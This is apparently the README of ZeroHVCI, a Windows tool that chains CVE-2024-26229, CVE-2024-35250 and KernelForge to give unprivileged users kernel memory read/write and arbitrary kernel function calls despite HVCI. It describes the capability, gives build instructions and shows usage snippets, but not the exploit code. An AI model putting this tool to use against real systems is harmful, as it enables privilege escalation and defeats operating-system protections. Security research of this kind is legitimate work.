ZeroHVCI accomplishes arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers.
- Full non-privileged kernel read/writes: Kernel read/writes are achieved by leveraging CVE-2024-26229 which requires no process elevation.
- Arbitrary Function Calling: Calls any arbitrary kernel functions with desired params fully from user land.
To get started with ZeroHVCI, you can clone this repository and build the project.
//
// Read kernel memory example:
//
ReadKernelMemory(source_address, buffer_address, size);//
// Write kernel memory example:
//
WriteKernelMemory(source_address, buffer_address, size);//
// Kernel function calling example via name:
//
KF::CallKernelFunctionViaName<kernel_param_type1, kernel_param_type2, kernel_param_type3>(
"kernel_function_name",
param1,
param2,
param3);//
// ExAllocatePool example:
//
KF::CallKernelFunctionViaName<PVOID, POOL_TYPE, SIZE_T>("ExAllocatePool", PoolType, Size);//
// memcpy example:
//
KF::CallKernelFunctionViaName<PVOID, PVOID, PVOID, SIZE_T>("memcpy", Dst, Src, Size);//
// PsLookupProcessByProcessId example:
//
PEPROCESS Process;
KF::CallKernelFunctionViaName<NTSTATUS, HANDLE, PEPROCESS*>("PsLookupProcessByProcessId", ProcessHandle, &Process);Two main projects are responsible for making this possible
- KernelForge- All credits to Dmytro Oleksiuk, his project allows us to gain HVCI-compliant kernel function calling by abusing the heirarchy of thread executions and construction rop chains without truly patching anything.
- CVE-2024-26229- All credits to Eric Egsgard, this exploit allows us to gain kernel read/write by abusing a IOCTL with METHOD_NEITHER in csc.sys (a windows module, resources will be linked below if you want to read-up more.
- CVE-2024-35250- All credits to Devcore team, this exploit allows us to gain kernel read/write by abusing RtlClearAllBits in ks.sys (a windows module, resources will be linked below if you want to read-up more.
Demonstrates how published CVEs can be chained for kernel access in HVCI-protected environments. Useful for security researchers studying Windows kernel integrity and HVCI bypass mitigations.
Cr4sh for KernelForge
varwara for his POC POC2
Eric Egsgard for his talk
For educational and authorized security research only. Don't use on systems you don't own or have explicit permission to test. I'm not responsible for misuse. Use at your own risk.
All product names, trademarks, and registered trademarks mentioned are property of their respective owners.